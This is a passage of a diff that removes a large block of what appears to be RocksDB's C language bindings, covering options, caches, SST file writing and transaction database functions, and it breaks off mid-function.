-rocksdb_filterpolicy_t* rocksdb_filterpolicy_create(
-    void* state,
-    void (*destructor)(void*),
-    char* (*create_filter)(
-        void*,
-        const char* const* key_array, const size_t* key_length_array,
-        int num_keys,
-        size_t* filter_length),
-    unsigned char (*key_may_match)(
-        void*,
-        const char* key, size_t length,
-        const char* filter, size_t filter_length),
-    void (*delete_filter)(
-        void*,
-        const char* filter, size_t filter_length),
-    const char* (*name)(void*)) {
-  rocksdb_filterpolicy_t* result = new rocksdb_filterpolicy_t;
-  result->state_ = state;
-  result->destructor_ = destructor;
-  result->create_ = create_filter;
-  result->key_match_ = key_may_match;
-  result->delete_filter_ = delete_filter;
-  result->name_ = name;
-  return result;
-}
-
-void rocksdb_filterpolicy_destroy(rocksdb_filterpolicy_t* filter) {
-  delete filter;
-}
-
-rocksdb_filterpolicy_t* rocksdb_filterpolicy_create_bloom_format(int bits_per_key, bool original_format) {
-  // Make a rocksdb_filterpolicy_t, but override all of its methods so
-  // they delegate to a NewBloomFilterPolicy() instead of user
-  // supplied C functions.
-  struct Wrapper : public rocksdb_filterpolicy_t {
-    const FilterPolicy* rep_;
-    ~Wrapper() { delete rep_; }
-    const char* Name() const override { return rep_->Name(); }
-    void CreateFilter(const Slice* keys, int n,
-                      std::string* dst) const override {
-      return rep_->CreateFilter(keys, n, dst);
-    }
-    bool KeyMayMatch(const Slice& key, const Slice& filter) const override {
-      return rep_->KeyMayMatch(key, filter);
-    }
-    static void DoNothing(void*) { }
-  };
-  Wrapper* wrapper = new Wrapper;
-  wrapper->rep_ = NewBloomFilterPolicy(bits_per_key, original_format);
-  wrapper->state_ = nullptr;
-  wrapper->delete_filter_ = nullptr;
-  wrapper->destructor_ = &Wrapper::DoNothing;
-  return wrapper;
-}
-
-rocksdb_filterpolicy_t* rocksdb_filterpolicy_create_bloom_full(int bits_per_key) {
-  return rocksdb_filterpolicy_create_bloom_format(bits_per_key, false);
-}
-
-rocksdb_filterpolicy_t* rocksdb_filterpolicy_create_bloom(int bits_per_key) {
-  return rocksdb_filterpolicy_create_bloom_format(bits_per_key, true);
-}
-
-rocksdb_mergeoperator_t* rocksdb_mergeoperator_create(
-    void* state, void (*destructor)(void*),
-    char* (*full_merge)(void*, const char* key, size_t key_length,
-                        const char* existing_value,
-                        size_t existing_value_length,
-                        const char* const* operands_list,
-                        const size_t* operands_list_length, int num_operands,
-                        unsigned char* success, size_t* new_value_length),
-    char* (*partial_merge)(void*, const char* key, size_t key_length,
-                           const char* const* operands_list,
-                           const size_t* operands_list_length, int num_operands,
-                           unsigned char* success, size_t* new_value_length),
-    void (*delete_value)(void*, const char* value, size_t value_length),
-    const char* (*name)(void*)) {
-  rocksdb_mergeoperator_t* result = new rocksdb_mergeoperator_t;
-  result->state_ = state;
-  result->destructor_ = destructor;
-  result->full_merge_ = full_merge;
-  result->partial_merge_ = partial_merge;
-  result->delete_value_ = delete_value;
-  result->name_ = name;
-  return result;
-}
-
-void rocksdb_mergeoperator_destroy(rocksdb_mergeoperator_t* merge_operator) {
-  delete merge_operator;
-}
-
-rocksdb_readoptions_t* rocksdb_readoptions_create() {
-  return new rocksdb_readoptions_t;
-}
-
-void rocksdb_readoptions_destroy(rocksdb_readoptions_t* opt) {
-  delete opt;
-}
-
-void rocksdb_readoptions_set_verify_checksums(
-    rocksdb_readoptions_t* opt,
-    unsigned char v) {
-  opt->rep.verify_checksums = v;
-}
-
-void rocksdb_readoptions_set_fill_cache(
-    rocksdb_readoptions_t* opt, unsigned char v) {
-  opt->rep.fill_cache = v;
-}
-
-void rocksdb_readoptions_set_snapshot(
-    rocksdb_readoptions_t* opt,
-    const rocksdb_snapshot_t* snap) {
-  opt->rep.snapshot = (snap ? snap->rep : nullptr);
-}
-
-void rocksdb_readoptions_set_iterate_upper_bound(
-    rocksdb_readoptions_t* opt,
-    const char* key, size_t keylen) {
-  if (key == nullptr) {
-    opt->upper_bound = Slice();
-    opt->rep.iterate_upper_bound = nullptr;
-
-  } else {
-    opt->upper_bound = Slice(key, keylen);
-    opt->rep.iterate_upper_bound = &opt->upper_bound;
-  }
-}
-
-void rocksdb_readoptions_set_read_tier(
-    rocksdb_readoptions_t* opt, int v) {
-  opt->rep.read_tier = static_cast<rocksdb::ReadTier>(v);
-}
-
-void rocksdb_readoptions_set_tailing(
-    rocksdb_readoptions_t* opt, unsigned char v) {
-  opt->rep.tailing = v;
-}
-
-void rocksdb_readoptions_set_readahead_size(
-    rocksdb_readoptions_t* opt, size_t v) {
-  opt->rep.readahead_size = v;
-}
-
-void rocksdb_readoptions_set_pin_data(rocksdb_readoptions_t* opt,
-                                      unsigned char v) {
-  opt->rep.pin_data = v;
-}
-
-void rocksdb_readoptions_set_total_order_seek(rocksdb_readoptions_t* opt,
-                                              unsigned char v) {
-  opt->rep.total_order_seek = v;
-}
-
-rocksdb_writeoptions_t* rocksdb_writeoptions_create() {
-  return new rocksdb_writeoptions_t;
-}
-
-void rocksdb_writeoptions_destroy(rocksdb_writeoptions_t* opt) {
-  delete opt;
-}
-
-void rocksdb_writeoptions_set_sync(
-    rocksdb_writeoptions_t* opt, unsigned char v) {
-  opt->rep.sync = v;
-}
-
-void rocksdb_writeoptions_disable_WAL(rocksdb_writeoptions_t* opt, int disable) {
-  opt->rep.disableWAL = disable;
-}
-
-rocksdb_compactoptions_t* rocksdb_compactoptions_create() {
-  return new rocksdb_compactoptions_t;
-}
-
-void rocksdb_compactoptions_destroy(rocksdb_compactoptions_t* opt) {
-  delete opt;
-}
-
-void rocksdb_compactoptions_set_exclusive_manual_compaction(
-    rocksdb_compactoptions_t* opt, unsigned char v) {
-  opt->rep.exclusive_manual_compaction = v;
-}
-
-void rocksdb_compactoptions_set_change_level(rocksdb_compactoptions_t* opt,
-                                             unsigned char v) {
-  opt->rep.change_level = v;
-}
-
-void rocksdb_compactoptions_set_target_level(rocksdb_compactoptions_t* opt,
-                                             int n) {
-  opt->rep.target_level = n;
-}
-
-rocksdb_flushoptions_t* rocksdb_flushoptions_create() {
-  return new rocksdb_flushoptions_t;
-}
-
-void rocksdb_flushoptions_destroy(rocksdb_flushoptions_t* opt) {
-  delete opt;
-}
-
-void rocksdb_flushoptions_set_wait(
-    rocksdb_flushoptions_t* opt, unsigned char v) {
-  opt->rep.wait = v;
-}
-
-rocksdb_cache_t* rocksdb_cache_create_lru(size_t capacity) {
-  rocksdb_cache_t* c = new rocksdb_cache_t;
-  c->rep = NewLRUCache(capacity);
-  return c;
-}
-
-void rocksdb_cache_destroy(rocksdb_cache_t* cache) {
-  delete cache;
-}
-
-void rocksdb_cache_set_capacity(rocksdb_cache_t* cache, size_t capacity) {
-  cache->rep->SetCapacity(capacity);
-}
-
-size_t rocksdb_cache_get_usage(rocksdb_cache_t* cache) {
-  return cache->rep->GetUsage();
-}
-
-size_t rocksdb_cache_get_pinned_usage(rocksdb_cache_t* cache) {
-  return cache->rep->GetPinnedUsage();
-}
-
-rocksdb_dbpath_t* rocksdb_dbpath_create(const char* path, uint64_t target_size) {
-  rocksdb_dbpath_t* result = new rocksdb_dbpath_t;
-  result->rep.path = std::string(path);
-  result->rep.target_size = target_size;
-  return result;
-}
-
-void rocksdb_dbpath_destroy(rocksdb_dbpath_t* dbpath) {
-  delete dbpath;
-}
-
-rocksdb_env_t* rocksdb_create_default_env() {
-  rocksdb_env_t* result = new rocksdb_env_t;
-  result->rep = Env::Default();
-  result->is_default = true;
-  return result;
-}
-
-rocksdb_env_t* rocksdb_create_mem_env() {
-  rocksdb_env_t* result = new rocksdb_env_t;
-  result->rep = rocksdb::NewMemEnv(Env::Default());
-  result->is_default = false;
-  return result;
-}
-
-void rocksdb_env_set_background_threads(rocksdb_env_t* env, int n) {
-  env->rep->SetBackgroundThreads(n);
-}
-
-void rocksdb_env_set_high_priority_background_threads(rocksdb_env_t* env, int n) {
-  env->rep->SetBackgroundThreads(n, Env::HIGH);
-}
-
-void rocksdb_env_join_all_threads(rocksdb_env_t* env) {
-  env->rep->WaitForJoin();
-}
-
-void rocksdb_env_destroy(rocksdb_env_t* env) {
-  if (!env->is_default) delete env->rep;
-  delete env;
-}
-
-rocksdb_envoptions_t* rocksdb_envoptions_create() {
-  rocksdb_envoptions_t* opt = new rocksdb_envoptions_t;
-  return opt;
-}
-
-void rocksdb_envoptions_destroy(rocksdb_envoptions_t* opt) { delete opt; }
-
-rocksdb_sstfilewriter_t* rocksdb_sstfilewriter_create(
-    const rocksdb_envoptions_t* env, const rocksdb_options_t* io_options) {
-  rocksdb_sstfilewriter_t* writer = new rocksdb_sstfilewriter_t;
-  writer->rep = new SstFileWriter(env->rep, io_options->rep);
-  return writer;
-}
-
-rocksdb_sstfilewriter_t* rocksdb_sstfilewriter_create_with_comparator(
-    const rocksdb_envoptions_t* env, const rocksdb_options_t* io_options,
-    const rocksdb_comparator_t* comparator) {
-  rocksdb_sstfilewriter_t* writer = new rocksdb_sstfilewriter_t;
-  writer->rep = new SstFileWriter(env->rep, io_options->rep);
-  return writer;
-}
-
-void rocksdb_sstfilewriter_open(rocksdb_sstfilewriter_t* writer,
-                                const char* name, char** errptr) {
-  SaveError(errptr, writer->rep->Open(std::string(name)));
-}
-
-void rocksdb_sstfilewriter_add(rocksdb_sstfilewriter_t* writer, const char* key,
-                               size_t keylen, const char* val, size_t vallen,
-                               char** errptr) {
-  SaveError(errptr, writer->rep->Put(Slice(key, keylen), Slice(val, vallen)));
-}
-
-void rocksdb_sstfilewriter_put(rocksdb_sstfilewriter_t* writer, const char* key,
-                               size_t keylen, const char* val, size_t vallen,
-                               char** errptr) {
-  SaveError(errptr, writer->rep->Put(Slice(key, keylen), Slice(val, vallen)));
-}
-
-void rocksdb_sstfilewriter_merge(rocksdb_sstfilewriter_t* writer,
-                                 const char* key, size_t keylen,
-                                 const char* val, size_t vallen,
-                                 char** errptr) {
-  SaveError(errptr, writer->rep->Merge(Slice(key, keylen), Slice(val, vallen)));
-}
-
-void rocksdb_sstfilewriter_delete(rocksdb_sstfilewriter_t* writer,
-                                  const char* key, size_t keylen,
-                                  char** errptr) {
-  SaveError(errptr, writer->rep->Delete(Slice(key, keylen)));
-}
-
-void rocksdb_sstfilewriter_finish(rocksdb_sstfilewriter_t* writer,
-                                  char** errptr) {
-  SaveError(errptr, writer->rep->Finish(NULL));
-}
-
-void rocksdb_sstfilewriter_destroy(rocksdb_sstfilewriter_t* writer) {
-  delete writer->rep;
-  delete writer;
-}
-
-rocksdb_ingestexternalfileoptions_t*
-rocksdb_ingestexternalfileoptions_create() {
-  rocksdb_ingestexternalfileoptions_t* opt =
-      new rocksdb_ingestexternalfileoptions_t;
-  return opt;
-}
-
-void rocksdb_ingestexternalfileoptions_set_move_files(
-    rocksdb_ingestexternalfileoptions_t* opt, unsigned char move_files) {
-  opt->rep.move_files = move_files;
-}
-
-void rocksdb_ingestexternalfileoptions_set_snapshot_consistency(
-    rocksdb_ingestexternalfileoptions_t* opt,
-    unsigned char snapshot_consistency) {
-  opt->rep.snapshot_consistency = snapshot_consistency;
-}
-
-void rocksdb_ingestexternalfileoptions_set_allow_global_seqno(
-    rocksdb_ingestexternalfileoptions_t* opt,
-    unsigned char allow_global_seqno) {
-  opt->rep.allow_global_seqno = allow_global_seqno;
-}
-
-void rocksdb_ingestexternalfileoptions_set_allow_blocking_flush(
-    rocksdb_ingestexternalfileoptions_t* opt,
-    unsigned char allow_blocking_flush) {
-  opt->rep.allow_blocking_flush = allow_blocking_flush;
-}
-
-void rocksdb_ingestexternalfileoptions_destroy(
-    rocksdb_ingestexternalfileoptions_t* opt) {
-  delete opt;
-}
-
-void rocksdb_ingest_external_file(
-    rocksdb_t* db, const char* const* file_list, const size_t list_len,
-    const rocksdb_ingestexternalfileoptions_t* opt, char** errptr) {
-  std::vector<std::string> files(list_len);
-  for (size_t i = 0; i < list_len; ++i) {
-    files[i] = std::string(file_list[i]);
-  }
-  SaveError(errptr, db->rep->IngestExternalFile(files, opt->rep));
-}
-
-void rocksdb_ingest_external_file_cf(
-    rocksdb_t* db, rocksdb_column_family_handle_t* handle,
-    const char* const* file_list, const size_t list_len,
-    const rocksdb_ingestexternalfileoptions_t* opt, char** errptr) {
-  std::vector<std::string> files(list_len);
-  for (size_t i = 0; i < list_len; ++i) {
-    files[i] = std::string(file_list[i]);
-  }
-  SaveError(errptr, db->rep->IngestExternalFile(handle->rep, files, opt->rep));
-}
-
-rocksdb_slicetransform_t* rocksdb_slicetransform_create(
-    void* state,
-    void (*destructor)(void*),
-    char* (*transform)(
-        void*,
-        const char* key, size_t length,
-        size_t* dst_length),
-    unsigned char (*in_domain)(
-        void*,
-        const char* key, size_t length),
-    unsigned char (*in_range)(
-        void*,
-        const char* key, size_t length),
-    const char* (*name)(void*)) {
-  rocksdb_slicetransform_t* result = new rocksdb_slicetransform_t;
-  result->state_ = state;
-  result->destructor_ = destructor;
-  result->transform_ = transform;
-  result->in_domain_ = in_domain;
-  result->in_range_ = in_range;
-  result->name_ = name;
-  return result;
-}
-
-void rocksdb_slicetransform_destroy(rocksdb_slicetransform_t* st) {
-  delete st;
-}
-
-rocksdb_slicetransform_t* rocksdb_slicetransform_create_fixed_prefix(size_t prefixLen) {
-  struct Wrapper : public rocksdb_slicetransform_t {
-    const SliceTransform* rep_;
-    ~Wrapper() { delete rep_; }
-    const char* Name() const override { return rep_->Name(); }
-    Slice Transform(const Slice& src) const override {
-      return rep_->Transform(src);
-    }
-    bool InDomain(const Slice& src) const override {
-      return rep_->InDomain(src);
-    }
-    bool InRange(const Slice& src) const override { return rep_->InRange(src); }
-    static void DoNothing(void*) { }
-  };
-  Wrapper* wrapper = new Wrapper;
-  wrapper->rep_ = rocksdb::NewFixedPrefixTransform(prefixLen);
-  wrapper->state_ = nullptr;
-  wrapper->destructor_ = &Wrapper::DoNothing;
-  return wrapper;
-}
-
-rocksdb_slicetransform_t* rocksdb_slicetransform_create_noop() {
-  struct Wrapper : public rocksdb_slicetransform_t {
-    const SliceTransform* rep_;
-    ~Wrapper() { delete rep_; }
-    const char* Name() const override { return rep_->Name(); }
-    Slice Transform(const Slice& src) const override {
-      return rep_->Transform(src);
-    }
-    bool InDomain(const Slice& src) const override {
-      return rep_->InDomain(src);
-    }
-    bool InRange(const Slice& src) const override { return rep_->InRange(src); }
-    static void DoNothing(void*) { }
-  };
-  Wrapper* wrapper = new Wrapper;
-  wrapper->rep_ = rocksdb::NewNoopTransform();
-  wrapper->state_ = nullptr;
-  wrapper->destructor_ = &Wrapper::DoNothing;
-  return wrapper;
-}
-
-rocksdb_universal_compaction_options_t* rocksdb_universal_compaction_options_create() {
-  rocksdb_universal_compaction_options_t* result = new rocksdb_universal_compaction_options_t;
-  result->rep = new rocksdb::CompactionOptionsUniversal;
-  return result;
-}
-
-void rocksdb_universal_compaction_options_set_size_ratio(
-  rocksdb_universal_compaction_options_t* uco, int ratio) {
-  uco->rep->size_ratio = ratio;
-}
-
-void rocksdb_universal_compaction_options_set_min_merge_width(
-  rocksdb_universal_compaction_options_t* uco, int w) {
-  uco->rep->min_merge_width = w;
-}
-
-void rocksdb_universal_compaction_options_set_max_merge_width(
-  rocksdb_universal_compaction_options_t* uco, int w) {
-  uco->rep->max_merge_width = w;
-}
-
-void rocksdb_universal_compaction_options_set_max_size_amplification_percent(
-  rocksdb_universal_compaction_options_t* uco, int p) {
-  uco->rep->max_size_amplification_percent = p;
-}
-
-void rocksdb_universal_compaction_options_set_compression_size_percent(
-  rocksdb_universal_compaction_options_t* uco, int p) {
-  uco->rep->compression_size_percent = p;
-}
-
-void rocksdb_universal_compaction_options_set_stop_style(
-  rocksdb_universal_compaction_options_t* uco, int style) {
-  uco->rep->stop_style = static_cast<rocksdb::CompactionStopStyle>(style);
-}
-
-void rocksdb_universal_compaction_options_destroy(
-  rocksdb_universal_compaction_options_t* uco) {
-  delete uco->rep;
-  delete uco;
-}
-
-rocksdb_fifo_compaction_options_t* rocksdb_fifo_compaction_options_create() {
-  rocksdb_fifo_compaction_options_t* result = new rocksdb_fifo_compaction_options_t;
-  result->rep =  CompactionOptionsFIFO();
-  return result;
-}
-
-void rocksdb_fifo_compaction_options_set_max_table_files_size(
-    rocksdb_fifo_compaction_options_t* fifo_opts, uint64_t size) {
-  fifo_opts->rep.max_table_files_size = size;
-}
-
-void rocksdb_fifo_compaction_options_destroy(
-    rocksdb_fifo_compaction_options_t* fifo_opts) {
-  delete fifo_opts;
-}
-
-void rocksdb_options_set_min_level_to_compress(rocksdb_options_t* opt, int level) {
-  if (level >= 0) {
-    assert(level <= opt->rep.num_levels);
-    opt->rep.compression_per_level.resize(opt->rep.num_levels);
-    for (int i = 0; i < level; i++) {
-      opt->rep.compression_per_level[i] = rocksdb::kNoCompression;
-    }
-    for (int i = level; i < opt->rep.num_levels; i++) {
-      opt->rep.compression_per_level[i] = opt->rep.compression;
-    }
-  }
-}
-
-int rocksdb_livefiles_count(
-  const rocksdb_livefiles_t* lf) {
-  return static_cast<int>(lf->rep.size());
-}
-
-const char* rocksdb_livefiles_name(
-  const rocksdb_livefiles_t* lf,
-  int index) {
-  return lf->rep[index].name.c_str();
-}
-
-int rocksdb_livefiles_level(
-  const rocksdb_livefiles_t* lf,
-  int index) {
-  return lf->rep[index].level;
-}
-
-size_t rocksdb_livefiles_size(
-  const rocksdb_livefiles_t* lf,
-  int index) {
-  return lf->rep[index].size;
-}
-
-const char* rocksdb_livefiles_smallestkey(
-  const rocksdb_livefiles_t* lf,
-  int index,
-  size_t* size) {
-  *size = lf->rep[index].smallestkey.size();
-  return lf->rep[index].smallestkey.data();
-}
-
-const char* rocksdb_livefiles_largestkey(
-  const rocksdb_livefiles_t* lf,
-  int index,
-  size_t* size) {
-  *size = lf->rep[index].largestkey.size();
-  return lf->rep[index].largestkey.data();
-}
-
-extern void rocksdb_livefiles_destroy(
-  const rocksdb_livefiles_t* lf) {
-  delete lf;
-}
-
-void rocksdb_get_options_from_string(const rocksdb_options_t* base_options,
-                                     const char* opts_str,
-                                     rocksdb_options_t* new_options,
-                                     char** errptr) {
-  SaveError(errptr,
-            GetOptionsFromString(base_options->rep, std::string(opts_str),
-                                 &new_options->rep));
-}
-
-void rocksdb_delete_file_in_range(rocksdb_t* db, const char* start_key,
-                                  size_t start_key_len, const char* limit_key,
-                                  size_t limit_key_len, char** errptr) {
-  Slice a, b;
-  SaveError(
-      errptr,
-      DeleteFilesInRange(
-          db->rep, db->rep->DefaultColumnFamily(),
-          (start_key ? (a = Slice(start_key, start_key_len), &a) : nullptr),
-          (limit_key ? (b = Slice(limit_key, limit_key_len), &b) : nullptr)));
-}
-
-void rocksdb_delete_file_in_range_cf(
-    rocksdb_t* db, rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len, const char* limit_key,
-    size_t limit_key_len, char** errptr) {
-  Slice a, b;
-  SaveError(
-      errptr,
-      DeleteFilesInRange(
-          db->rep, column_family->rep,
-          (start_key ? (a = Slice(start_key, start_key_len), &a) : nullptr),
-          (limit_key ? (b = Slice(limit_key, limit_key_len), &b) : nullptr)));
-}
-
-rocksdb_transactiondb_options_t* rocksdb_transactiondb_options_create() {
-  return new rocksdb_transactiondb_options_t;
-}
-
-void rocksdb_transactiondb_options_destroy(rocksdb_transactiondb_options_t* opt){
-  delete opt;
-}
-
-void rocksdb_transactiondb_options_set_max_num_locks(
-    rocksdb_transactiondb_options_t* opt, int64_t max_num_locks) {
-  opt->rep.max_num_locks = max_num_locks;
-}
-
-void rocksdb_transactiondb_options_set_num_stripes(
-    rocksdb_transactiondb_options_t* opt, size_t num_stripes) {
-  opt->rep.num_stripes = num_stripes;
-}
-
-void rocksdb_transactiondb_options_set_transaction_lock_timeout(
-    rocksdb_transactiondb_options_t* opt, int64_t txn_lock_timeout) {
-  opt->rep.transaction_lock_timeout = txn_lock_timeout;
-}
-
-void rocksdb_transactiondb_options_set_default_lock_timeout(
-    rocksdb_transactiondb_options_t* opt, int64_t default_lock_timeout) {
-  opt->rep.default_lock_timeout = default_lock_timeout;
-}
-
-rocksdb_transaction_options_t* rocksdb_transaction_options_create() {
-  return new rocksdb_transaction_options_t;
-}
-
-void rocksdb_transaction_options_destroy(rocksdb_transaction_options_t* opt) {
-  delete opt;
-}
-
-void rocksdb_transaction_options_set_set_snapshot(
-    rocksdb_transaction_options_t* opt, unsigned char v) {
-  opt->rep.set_snapshot = v;
-}
-
-void rocksdb_transaction_options_set_deadlock_detect(
-    rocksdb_transaction_options_t* opt, unsigned char v) {
-  opt->rep.deadlock_detect = v;
-}
-
-void rocksdb_transaction_options_set_lock_timeout(
-    rocksdb_transaction_options_t* opt, int64_t lock_timeout) {
-  opt->rep.lock_timeout = lock_timeout;
-}
-
-void rocksdb_transaction_options_set_expiration(
-    rocksdb_transaction_options_t* opt, int64_t expiration) {
-  opt->rep.expiration = expiration;
-}
-
-void rocksdb_transaction_options_set_deadlock_detect_depth(
-    rocksdb_transaction_options_t* opt, int64_t depth) {
-  opt->rep.deadlock_detect_depth = depth;
-}
-
-void rocksdb_transaction_options_set_max_write_batch_size(
-    rocksdb_transaction_options_t* opt, size_t size) {
-  opt->rep.max_write_batch_size = size;
-}
-
-rocksdb_optimistictransaction_options_t*
-rocksdb_optimistictransaction_options_create() {
-  return new rocksdb_optimistictransaction_options_t;
-}
-
-void rocksdb_optimistictransaction_options_destroy(
-    rocksdb_optimistictransaction_options_t* opt) {
-  delete opt;
-}
-
-void rocksdb_optimistictransaction_options_set_set_snapshot(
-    rocksdb_optimistictransaction_options_t* opt, unsigned char v) {
-  opt->rep.set_snapshot = v;
-}
-
-rocksdb_column_family_handle_t* rocksdb_transactiondb_create_column_family(
-    rocksdb_transactiondb_t* txn_db,
-    const rocksdb_options_t* column_family_options,
-    const char* column_family_name, char** errptr) {
-  rocksdb_column_family_handle_t* handle = new rocksdb_column_family_handle_t;
-  SaveError(errptr, txn_db->rep->CreateColumnFamily(
-                        ColumnFamilyOptions(column_family_options->rep),
-                        std::string(column_family_name), &(handle->rep)));
-  return handle;
-}
-
-rocksdb_transactiondb_t* rocksdb_transactiondb_open(
-    const rocksdb_options_t* options,
-    const rocksdb_transactiondb_options_t* txn_db_options, const char* name,
-    char** errptr) {
-  TransactionDB* txn_db;
-  if (SaveError(errptr, TransactionDB::Open(options->rep, txn_db_options->rep,
-                                            std::string(name), &txn_db))) {
-    return nullptr;
-  }
-  rocksdb_transactiondb_t* result = new rocksdb_transactiondb_t;
-  result->rep = txn_db;
-  return result;
-}
-
-const rocksdb_snapshot_t* rocksdb_transactiondb_create_snapshot(
-    rocksdb_transactiondb_t* txn_db) {
-  rocksdb_snapshot_t* result = new rocksdb_snapshot_t;
-  result->rep = txn_db->rep->GetSnapshot();
-  return result;
-}
-
-void rocksdb_transactiondb_release_snapshot(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_snapshot_t* snapshot) {
-  txn_db->rep->ReleaseSnapshot(snapshot->rep);
-  delete snapshot;
-}
-
-rocksdb_transaction_t* rocksdb_transaction_begin(
-    rocksdb_transactiondb_t* txn_db,
-    const rocksdb_writeoptions_t* write_options,
-    const rocksdb_transaction_options_t* txn_options,
-    rocksdb_transaction_t* old_txn) {
-  if (old_txn == nullptr) {
-    rocksdb_transaction_t* result = new rocksdb_transaction_t;
-    result->rep = txn_db->rep->BeginTransaction(write_options->rep,
-                                                txn_options->rep, nullptr);
-    return result;
-  }
-  old_txn->rep = txn_db->rep->BeginTransaction(write_options->rep,
-                                                txn_options->rep, old_txn->rep);
-  return old_txn;
-}
-
-void rocksdb_transaction_commit(rocksdb_transaction_t* txn, char** errptr) {
-  SaveError(errptr, txn->rep->Commit());
-}
-
-void rocksdb_transaction_rollback(rocksdb_transaction_t* txn, char** errptr) {
-  SaveError(errptr, txn->rep->Rollback());
-}
-
-void rocksdb_transaction_destroy(rocksdb_transaction_t* txn) {
-  delete txn->rep;
-  delete txn;
-}
-
-const rocksdb_snapshot_t* rocksdb_transaction_get_snapshot(
-    rocksdb_transaction_t* txn) {
-  rocksdb_snapshot_t* result = new rocksdb_snapshot_t;
-  result->rep = txn->rep->GetSnapshot();
-  return result;
-}
-
-// Read a key inside a transaction
-char* rocksdb_transaction_get(rocksdb_transaction_t* txn,
-                              const rocksdb_readoptions_t* options,
-                              const char* key, size_t klen, size_t* vlen,
-                              char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = txn->rep->Get(options->rep, Slice(key, klen), &tmp);
-  if (s.ok()) {
-    *vlen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vlen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-char* rocksdb_transaction_get_cf(rocksdb_transaction_t* txn,
-                                 const rocksdb_readoptions_t* options,
-                                 rocksdb_column_family_handle_t* column_family,
-                                 const char* key, size_t klen, size_t* vlen,
-                                 char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s =
-      txn->rep->Get(options->rep, column_family->rep, Slice(key, klen), &tmp);
-  if (s.ok()) {
-    *vlen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vlen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-// Read a key inside a transaction
-char* rocksdb_transaction_get_for_update(rocksdb_transaction_t* txn,
-                                         const rocksdb_readoptions_t* options,
-                                         const char* key, size_t klen,
-                                         size_t* vlen, unsigned char exclusive,
-                                         char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s =
-      txn->rep->GetForUpdate(options->rep, Slice(key, klen), &tmp, exclusive);
-  if (s.ok()) {
-    *vlen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vlen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-// Read a key outside a transaction
-char* rocksdb_transactiondb_get(
-    rocksdb_transactiondb_t* txn_db,
-    const rocksdb_readoptions_t* options,
-    const char* key, size_t klen,
-    size_t* vlen,
-    char** errptr){
-  char* result = nullptr;
-  std::string tmp;
-  Status s = txn_db->rep->Get(options->rep, Slice(key, klen), &tmp);
-  if (s.ok()) {
-    *vlen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vlen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-char* rocksdb_transactiondb_get_cf(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, size_t* vallen, char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = txn_db->rep->Get(options->rep, column_family->rep,
-                              Slice(key, keylen), &tmp);
-  if (s.ok()) {
-    *vallen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vallen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-// Put a key inside a transaction
-void rocksdb_transaction_put(rocksdb_transaction_t* txn, const char* key,
-                             size_t klen, const char* val, size_t vlen,
-                             char** errptr) {
-  SaveError(errptr, txn->rep->Put(Slice(key, klen), Slice(val, vlen)));
-}
-
-void rocksdb_transaction_put_cf(rocksdb_transaction_t* txn,
-                                rocksdb_column_family_handle_t* column_family,
-                                const char* key, size_t klen, const char* val,
-                                size_t vlen, char** errptr) {
-  SaveError(errptr, txn->rep->Put(column_family->rep, Slice(key, klen),
-                                  Slice(val, vlen)));
-}
-
-// Put a key outside a transaction
-void rocksdb_transactiondb_put(rocksdb_transactiondb_t* txn_db,
-                               const rocksdb_writeoptions_t* options,
-                               const char* key, size_t klen, const char* val,
-                               size_t vlen, char** errptr) {
-  SaveError(errptr, txn_db->rep->Put(options->rep, Slice(key, klen), 
-                                     Slice(val, vlen)));
-}
-
-void rocksdb_transactiondb_put_cf(rocksdb_transactiondb_t* txn_db,
-                                  const rocksdb_writeoptions_t* options,
-                                  rocksdb_column_family_handle_t* column_family,
-                                  const char* key, size_t keylen,
-                                  const char* val, size_t vallen,
-                                  char** errptr) {
-  SaveError(errptr, txn_db->rep->Put(options->rep, column_family->rep,
-                                     Slice(key, keylen), Slice(val, vallen)));
-}
-
-// Write batch into transaction db
-void rocksdb_transactiondb_write(
-        rocksdb_transactiondb_t* db,
-        const rocksdb_writeoptions_t* options,
-        rocksdb_writebatch_t* batch,
-        char** errptr) {
-  SaveError(errptr, db->rep->Write(options->rep, &batch->rep));
-}
-
-// Merge a key inside a transaction
-void rocksdb_transaction_merge(rocksdb_transaction_t* txn, const char* key,
-                               size_t klen, const char* val, size_t vlen,
-                               char** errptr) {
-  SaveError(errptr, txn->rep->Merge(Slice(key, klen), Slice(val, vlen)));
-}
-
-// Merge a key outside a transaction
-void rocksdb_transactiondb_merge(rocksdb_transactiondb_t* txn_db,
-                                 const rocksdb_writeoptions_t* options,
-                                 const char* key, size_t klen, const char* val,
-                                 size_t vlen, char** errptr) {
-  SaveError(errptr,
-    txn_db->rep->Merge(options->rep, Slice(key, klen), Slice(val, vlen)));
-}
-
-// Delete a key inside a transaction
-void rocksdb_transaction_delete(rocksdb_transaction_t* txn, const char* key,
-                                size_t klen, char** errptr) {
-  SaveError(errptr, txn->rep->Delete(Slice(key, klen)));
-}
-
-void rocksdb_transaction_delete_cf(
-    rocksdb_transaction_t* txn, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen, char** errptr) {
-  SaveError(errptr, txn->rep->Delete(column_family->rep, Slice(key, klen)));
-}
-
-// Delete a key outside a transaction
-void rocksdb_transactiondb_delete(rocksdb_transactiondb_t* txn_db,
-                                  const rocksdb_writeoptions_t* options,
-                                  const char* key, size_t klen, char** errptr) {
